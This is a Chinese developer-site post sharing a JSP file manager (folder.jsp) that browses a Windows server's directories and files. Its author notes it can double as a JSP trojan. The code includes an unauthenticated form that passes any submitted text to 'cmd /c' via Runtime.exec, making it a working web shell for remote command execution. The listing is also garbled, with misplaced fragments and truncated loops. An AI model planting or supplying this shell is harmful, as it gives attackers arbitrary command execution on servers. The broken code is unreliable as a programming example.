当前页面: 开发资料首页 → JSP 专题 → JSP文件管理器0.5版本,显示目录和文件,支持cmd操作,也可当jsp木马使用:-)
摘要: JSP文件管理器0.5版本,显示目录和文件,支持cmd操作,也可当jsp木马使用:-)
想慢慢完善一下这个 folder.jsp 小程序,增加一些功能,比如文件编辑,删除等
目录操作(建立新目录,删除目录等等)
程序写的比较乱,以后慢慢整理整理
欢迎大家多提宝贵意见。
<%
/**
Jsp File Manger V0.5 windows平台的
文件名: folder.jsp
描述: 一个简单的系统文件目录显示程序,类似于资源管理器,不过功能弱多了。通过这个例子主要是学习一下SYstem.IO.File类 。
作者: 慈勤强
Emai : cqq1978@Gmail.com
*/
%>
<%@ page contentType="text/html;charset=gb2312"%>
<%@page import="java.io.*" %>
<%@page import="java.util.*"%>
if(strDir==null||strDir.length()<1) } <%=sb%> <% %>
{
strDir = "c:\\";
}
StringBuffer sb=new StringBuffer("");
StringBuffer sbFile=new StringBuffer("");
try
{
out.println("<table border=1 width='100%' bgcolor='#F1f1f1'><tr><td width='30%'>当前目录: "+strDir+"</td><td>" + getDrivers() + "</td></tr></table>
\r\n");
File objFile = new File(strDir);
File list[] = objFile.listFiles();
if(objFile.getAbsolutePath().length()>3)
{
sb.append("<tr><td > </td><td>");
sb.append("上级目录
- - - - - - - - - - - </td></tr>\r\n");
}
for(int i=0;i
if(list[i].isDirectory())
{
sb.append("<tr><td > </td><td>");
sb.append(""+list[i].getName()+"");
sb.append("</td></tr>");
//sb.append("</td></tr></table>\r\n");
}
else
{
String strLen="";
String strDT="";
long lFile=0;
lFile=list[i].length();
if(lFile>1000000)
{
lFile=lFile/1000000;
strLen="" + lFile + " M";
}
else if(lFile>1000)
{
lFile=lFile/1000;
strLen="" + lFile + " K";
}
else
{
strLen="" + lFile + " Byte";
}
Date dt=new Date(list[i].lastModified());
strDT=dt.toLocaleString();
sbFile.append("<tr><td>");
sbFile.append(""+list[i].getName());
sbFile.append("</td><td>");
sbFile.append(""+strLen);
sbFile.append("</td><td>");
sbFile.append(""+strDT);
sbFile.append("</td><td>");
sbFile.append("
//out.println(sb.toString()+sbFile.toString());
}
catch(Exception e)
{
out.println("操作失败: "+e.toString()+"");
}
%>
<table width="100%" border="1" cellspacing="0" cellpadding="5" bordercolorlight="#000000" bordercolordark="#FFFFFF">
<tr>
<td width="25%" align="center" valign="top">
<table width="98%" border="0" cellspacing="0" cellpadding="3">
</tr>
</table>
</td>
<td width="81%" align="center" valign="top">
<table width="98%" border="1" cellspacing="1" cellpadding="4" bordercolorlight="#cccccc" bordercolordark="#FFFFFF">
<tr bgcolor="#E7e7e6">
<td width="26%">文件名称</td>
<td width="19%" align="center">文件大小</td>
<td width="29%" align="center">修改时间</td>
<td width="26%" align="center">文件操作</td>
</tr>
<%=sbFile%>
String strCmd="";
String line="";
StringBuffer sbCmd=new StringBuffer("");
strCmd = request.getParameter("cmd");
if(strCmd!=null)
{
try
{
//out.println(strCmd);
Process p=Runtime.getRuntime().exec("cmd /c "+strCmd);
BufferedReader br=new BufferedReader(new InputStreamReader(p.getInputStream()));
while((line=br.readLine())!=null)
{
sbCmd.append(line+"\r\n");
}
}
catch(Exception e)
{
System.out.println(e.toString());
}
}
<form name="cmd" action="" method="post">
<input type="text" name="cmd" value="<%=strCmd%>" size=50>
<input type=submit name=submit value="执行">
</form>
<%
if(sbCmd!=null && sbCmd.toString().trim().equals("")==false)
{
%>
<textarea NAME="cqq" ROWS="20" COLS="100%"><%=sbCmd.toString()%></textarea>
<%
}
%>